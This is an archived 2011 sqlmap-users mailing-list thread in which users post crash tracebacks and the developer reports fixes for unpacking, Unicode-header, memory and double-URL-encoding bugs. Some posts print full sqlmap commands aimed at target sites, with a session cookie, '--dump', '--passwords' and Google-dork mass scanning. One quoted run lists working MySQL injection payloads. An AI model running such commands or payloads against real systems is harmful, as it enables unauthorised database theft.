[17:41:07] [INFO] read from file '/pentest/database/sqlmap/output/192.168.200.203/session':
[17:41:08] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[17:41:30] [INFO] read from file '/pentest/database/sqlmap/output/192.168.200.203/session':
[17:41:30] [INFO] retrieved:

[17:41:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r3125)
Python version: 2.6.5
Operating system: posix
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 414, in start
    action()
  File "/pentest/database/sqlmap/lib/controller/action.py", line 106, in action
    conf.dbmsHandler.dumpAll()
  File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1405, in dumpAll
    kb.data.cachedTables = self.getTables()
  File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 821, in getTables
    for db, table in value:
ValueError: need more than 1 value to unpack

[*] shutting down at: 17:41:37
From: Miroslav S. <mir...@gm...> - 2011-01-28 14:31:55

Hi all.

All of you who noticed error like (especially for '--passwords' switch):

"ValueError: need more than 1 value to unpack"

Bug has been found and fixed :)

Enjoy!

KR

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-28 14:31:48

fixed

kr

On Thu, Jan 27, 2011 at 3:04 AM, m4l1c3 <mal...@gm...> wrote:
>
> ./sqlmap.py -u "http://DOMAIN:80/LANG/DIR/PARAM.php?xxx=999" --passwords
>
> sqlmap version: 0.9-dev (r3115)
> Python version: 2.5.2
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 414, in start
>     action()
>   File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 77, in action
>     conf.dbmsHandler.getPasswordHashes(), "password hash")
>   File "/pentest/database/sqlmap-dev/plugins/generic/enumeration.py", line 238, in getPasswordHashes
>     for user, password in value:
> ValueError: need more than 1 value to unpack

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-28 13:38:37

hi.

this is a "relative" of a bug reported by black zero <tim...@gm...> dated 12/28/10 ([sqlmap-users] UnicodeEncodeError: 'ascii') which was patched at non-optimization level (normal connection module). now, it's being done at the keepalive module too.

problem is introduced because of "non-ASCII conformant chars are used in headers" which python's httplib and urllib2 have (KNOWN) problems with. now, those problematic header values/characters are converted to the format described in http://en.wikipedia.org/wiki/Unicode_and_HTML.

kr

p.s. please update and report if problem(s) persist

On Fri, Jan 28, 2011 at 2:01 PM, m4l1c3 <mal...@gm...> wrote:
> ./sqlmap.py -g "domain.xx ext:php" --dbs --batch -o
>
> sqlmap version: 0.9-dev (r3122)
> Python version: 2.5.2
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 254, in start
>     checkNullConnection()
>   File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 748, in checkNullConnection
>     page, headers = Request.getPage(method=HTTPMETHOD.HEAD)
>   File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 197, in getPage
>     conn = urllib2.urlopen(req)
>   File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
>     return _opener.open(url, data)
>   File "/usr/lib/python2.5/urllib2.py", line 381, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.5/urllib2.py", line 399, in _open
>     '_open', req)
>   File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
>     result = func(*args)
>   File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 208, in http_open
>     return self.do_open(HTTPConnection, req)
>   File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 179, in do_open
>     self._start_connection(h, req)
>   File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 138, in _start_connection
>     h.endheaders()
>   File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 336, in endheaders
>     self._send_output()
>   File "/usr/lib/python2.5/httplib.py", line 732, in _send_output
>     self.send(msg)
>   File "/usr/lib/python2.5/httplib.py", line 711, in send
>     self.sock.sendall(str)
>   File "<string>", line 1, in sendall
> UnicodeEncodeError: 'ascii' codec can't encode characters in position 82-87: ordinal not in range(128)
>
> This doesn't look like a problem to me, but I thought I'd pass it on if I
> missed something.

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: m4l1c3 <mal...@gm...> - 2011-01-28 13:01:08

./sqlmap.py -g "domain.xx ext:php" --dbs --batch -o

sqlmap version: 0.9-dev (r3122)
Python version: 2.5.2
Operating system: posix
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 254, in start
    checkNullConnection()
  File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 748, in checkNullConnection
    page, headers = Request.getPage(method=HTTPMETHOD.HEAD)
  File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 197, in getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
    return _opener.open(url, data)
  File "/usr/lib/python2.5/urllib2.py", line 381, in open
    response = self._open(req, data)
  File "/usr/lib/python2.5/urllib2.py", line 399, in _open
    '_open', req)
  File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
    result = func(*args)
  File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 208, in http_open
    return self.do_open(HTTPConnection, req)
  File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 179, in do_open
    self._start_connection(h, req)
  File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 138, in _start_connection
    h.endheaders()
  File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line 336, in endheaders
    self._send_output()
  File "/usr/lib/python2.5/httplib.py", line 732, in _send_output
    self.send(msg)
  File "/usr/lib/python2.5/httplib.py", line 711, in send
    self.sock.sendall(str)
  File "<string>", line 1, in sendall
UnicodeEncodeError: 'ascii' codec can't encode characters in position 82-87: ordinal not in range(128)

This doesn't look like a problem to me, but I thought I'd pass it on if I missed something.
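The header conversion described in Miroslav Stampar's reply to this report, sketched as an added example that is not sqlmap's code and not part of either post. It assumes the format meant is the numeric character reference (`&#NNNN;`) from the linked Wikipedia page; the function names, host and header values are constructed, and because Python 3's `http.client` encodes header values as latin-1 (Python 2's `httplib` in the traceback failed on ASCII) the sample uses Cyrillic text to reproduce the failure.

```python
import html
import http.client


def to_charref(value):
    """Replace every non-ASCII character with an HTML numeric character reference."""
    return value.encode("ascii", "xmlcharrefreplace").decode("ascii")


def sanitize_headers(headers):
    """Return a copy of the header dict whose values are pure ASCII."""
    return {name: to_charref(value) for name, value in headers.items()}


def stdlib_accepts(name, value):
    """True if http.client can serialise the header. No socket is opened."""
    conn = http.client.HTTPConnection("target.example")  # placeholder, never contacted
    conn.putrequest("HEAD", "/")     # only fills the in-memory send buffer
    try:
        conn.putheader(name, value)  # str values are encoded here
    except UnicodeEncodeError:
        return False
    return True


# Constructed sample: a Referer carrying non-ASCII text, as a URL taken from
# search results might.
RAW_HEADERS = {
    "User-Agent": "example-client/1.0",
    "Referer": "http://site.example/?q=Москва",
}
SAFE_HEADERS = sanitize_headers(RAW_HEADERS)

if __name__ == "__main__":
    for name, raw in RAW_HEADERS.items():
        safe = SAFE_HEADERS[name]
        print("%-10s raw accepted: %-5s converted accepted: %-5s %s"
              % (name, stdlib_accepts(name, raw), stdlib_accepts(name, safe), safe))
    # The conversion is lossless: a receiver can recover the original text.
    print(html.unescape(SAFE_HEADERS["Referer"]) == RAW_HEADERS["Referer"])
```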
From: Miroslav S. <mir...@gm...> - 2011-01-27 22:13:05

Hi.

I would suggest you to research "lib\core\testing.py" (liveTest() together with auxiliary methods). It was not updated for quite a long time, but it should be useful for starters. It's meant for our internal testing (smoke testing for dummy checking via module loading and live testing against our VMs).

KR

On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho <and...@gm...> wrote:
> Guys,
>
> What's the best way to create a sqlmap wrapper?
>
> In the w3af project we have a very old version of sqlmap
> integrated as an attack plugin [0]. Right now we're doing something
> like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap
> version we include is very old, I would like to update it to the
> latest trunk version. My objective is to build something that's
> extensible and will allow me to update w3af's sqlmap frequently
> without any (if possible) effort. In order to do that, I need to write
> a decent wrapper that will not depend on the changes in sqlmap's
> implementation.
>
> Ideas?
>
> Regards,
>
> [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts)
> --
> Andrés Riancho
> Director of Web Security at Rapid7 LLC
> Founder at Bonsai Information Security
> Project Leader at w3af

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Andres R. <and...@gm...> - 2011-01-27 22:05:09

Guys,

What's the best way to create a sqlmap wrapper?

In the w3af project we have a very old version of sqlmap integrated as an attack plugin [0]. Right now we're doing something like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap version we include is very old, I would like to update it to the latest trunk version. My objective is to build something that's extensible and will allow me to update w3af's sqlmap frequently without any (if possible) effort. In order to do that, I need to write a decent wrapper that will not depend on the changes in sqlmap's implementation.

Ideas?

Regards,

[0] (which is called sqlmap, we don't try to fool nobody or steal your efforts)

--
Andrés Riancho
Director of Web Security at Rapid7 LLC
Founder at Bonsai Information Security
Project Leader at w3af
From: Miroslav S. <mir...@gm...> - 2011-01-27 20:04:19

in the meantime you can try to use these:

--start=LIMITSTART  First query output entry to retrieve
--stop=LIMITSTOP    Last query output entry to retrieve

kr

On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar <mir...@gm...> wrote:
> http://mail.python.org/pipermail/mailman-users/2005-October/047436.html
>
> "A MemoryError exception is a built-in Python exception "Raised when an
> operation runs out of memory but the situation may still be rescued
> (by deleting some objects)."
>
> How many members does this list have? According to the FAQ, the largest
> list reported to date has 147,000 members and presumably works.
> Possibly something in the cPanel implementation or your particular
> installation limits this to a greater degree."
>
> now, this messes our concept a bit but we'll try to adapt.
>
> kr

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:55:30

http://mail.python.org/pipermail/mailman-users/2005-October/047436.html

"A MemoryError exception is a built-in Python exception "Raised when an operation runs out of memory but the situation may still be rescued (by deleting some objects)."

How many members does this list have? According to the FAQ, the largest list reported to date has 147,000 members and presumably works. Possibly something in the cPanel implementation or your particular installation limits this to a greater degree."

now, this messes our concept a bit but we'll try to adapt.

kr

On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar <mir...@gm...> wrote:
> LOL (50,350 entries in the table and 48 columns)
>
> we'll try to make some tests regarding this and report accordingly.
> haven't planned this kind of "huge" data retrievals :)
>
> kr

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:48:48
|
LOL (50,350 entries in the table and 48 columns) we'll try to make some tests regarding this and report accordingly. haven't planned this kind of "huge" data retrievals :)

kr

On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote:
> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 -D nomes -T class --dump
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 16:58:05
>
> [16:58:05] [DEBUG] cleaning up configuration parameters
> [16:58:05] [DEBUG] setting the HTTP timeout
> [16:58:05] [DEBUG] setting the HTTP Cookie header
> [16:58:05] [DEBUG] setting the HTTP method to POST
> [16:58:05] [DEBUG] creating HTTP requests opener object
> [16:58:05] [INFO] using '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
> [16:58:05] [INFO] resuming injection data from session file
> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [16:58:05] [INFO] testing connection to the target url
> you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n]
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: POST
> Parameter: vulnparam
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: vulnparam=6 AND 5647=5647
>
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 4 to 7 columns
>     Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: vulnparam=6 AND SLEEP(5)
> ---
>
> [16:58:06] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.3.2
> back-end DBMS: MySQL 5.0
> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
> [16:58:06] [INFO] read from file '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM nomes.class#
> [17:00:09] [DEBUG] performed 1 queries in 122 seconds
>
> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.5
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in start
>     action()
>   File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
>     conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
>   File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
>     value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>   File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>     data = parseUnionPage(output, expression, partial, None, sort)
>   File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in parseUnionPage
>     dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, logOutput))
> MemoryError
>
> [*] shutting down at: 17:00:13
>
> There are about 50,350 entries in the table and 48 columns. I tested the
> query manually, and it returned a page with 600k of information. I think that
> sqlmap did not support the amount of data...?
>
> David

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: David G. <sk...@gm...> - 2011-01-27 19:40:54
|
# ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 -D nomes -T class --dump

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 16:58:05

[16:58:05] [DEBUG] cleaning up configuration parameters
[16:58:05] [DEBUG] setting the HTTP timeout
[16:58:05] [DEBUG] setting the HTTP Cookie header
[16:58:05] [DEBUG] setting the HTTP method to POST
[16:58:05] [DEBUG] creating HTTP requests opener object
[16:58:05] [INFO] using '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
[16:58:05] [INFO] resuming injection data from session file
[16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:58:05] [INFO] testing connection to the target url
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: vulnparam
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: vulnparam=6 AND 5647=5647

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 to 7 columns
    Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: vulnparam=6 AND SLEEP(5)
---

[16:58:06] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.2
back-end DBMS: MySQL 5.0
[16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
[16:58:06] [INFO] read from file '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
[16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
[16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM nomes.class#
[17:00:09] [DEBUG] performed 1 queries in 122 seconds

[17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev
Python version: 2.6.5
Operating system: posix
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in start
    action()
  File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
    conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
  File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in dumpTable
    entries = inject.getValue(query, blind=False, dump=True)
  File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
    value = __goInband(query, expected, sort, resumeValue, unpack, dump)
  File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
    data = parseUnionPage(output, expression, partial, None, sort)
  File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in parseUnionPage
    dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, logOutput))
MemoryError

[*] shutting down at: 17:00:13

There are about 50,350 entries in the table and 48 columns. I tested the query manually, and it returned a page with 600k of information. I think that sqlmap did not support the amount of data...?

David
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 18:48:50
|
Hi again.

This should be fixed with the last commit removing false positive cases.

KR

p.s. expect a huge speed up for UNION based detection in following days/week

On Tue, Jan 25, 2011 at 5:07 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi all.
>
> Just to drop a quick warning message. Currently there is a major
> problem going on code named "Generic UNION/SQLite". All of you who
> think that you've stumbled upon a Generic UNION/SQLite injection
> you've probably had a "visit" by a FALSE positive.
>
> We'll try to fix this ASAP together with other UNION based detection issues.
>
> KR

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 18:42:04
|
Hi all.

Apologies, and big thanks to Ahmed Shawky <ah...@is...> for pointing to this problem.

If you had FALSE negatives for url parameters having original values with url encoded data, you've probably encountered this bug.

Basically, we were improperly urlencoding payloads together with original parameter values potentially leading to DOUBLE url encoding of original parameter values (especially the case for multi-word string values).

Example:
Original: name=John%20Smith
Improper injection payload (notice the double url encoding %25%20): name=John%25%20Smith%20AND%201%3D1

Now it should be fixed, but feel free to report "strange" behavior. Only strange thing is that nobody has noticed this till now :)

KR
|
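The double encoding described in the message above, reproduced with Python 3's `urllib.parse` as an added example (not part of the original post and not sqlmap's code; the function names are hypothetical). It shows what the application receives after the server's single decoding pass, which is why the original value stops matching and the test comes back as a false negative; with standard percent-encoding the re-encoded space appears as `%2520`.

```python
import re
from urllib.parse import quote, unquote

ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")


def build_buggy(name, encoded_value, appended):
    """Pre-fix behaviour: re-encode the already-encoded value with the suffix."""
    # quote() rewrites the '%' of '%20' as '%25', so '%20' becomes '%2520'.
    return name + "=" + quote(encoded_value + appended, safe="")


def build_fixed(name, encoded_value, appended):
    """Keep the original value as received; encode only the appended text."""
    return name + "=" + encoded_value + quote(appended, safe="")


def server_view(param):
    """Value the application sees after the server's single decoding pass."""
    _, _, value = param.partition("=")
    return unquote(value)


def looks_double_encoded(param):
    """Heuristic check: an escape sequence survives one decoding pass."""
    return ESCAPE.search(server_view(param)) is not None


if __name__ == "__main__":
    original = "John%20Smith"  # original parameter value from the message
    appended = " AND 1=1"      # decoded form of the appended test string
    for build in (build_buggy, build_fixed):
        param = build("name", original, appended)
        print(build.__name__, param, repr(server_view(param)),
              looks_double_encoded(param))
```

The same check works as a regression test for any client that appends text to parameters it did not encode itself; a value that legitimately contains the literal text `%20` will also trip it.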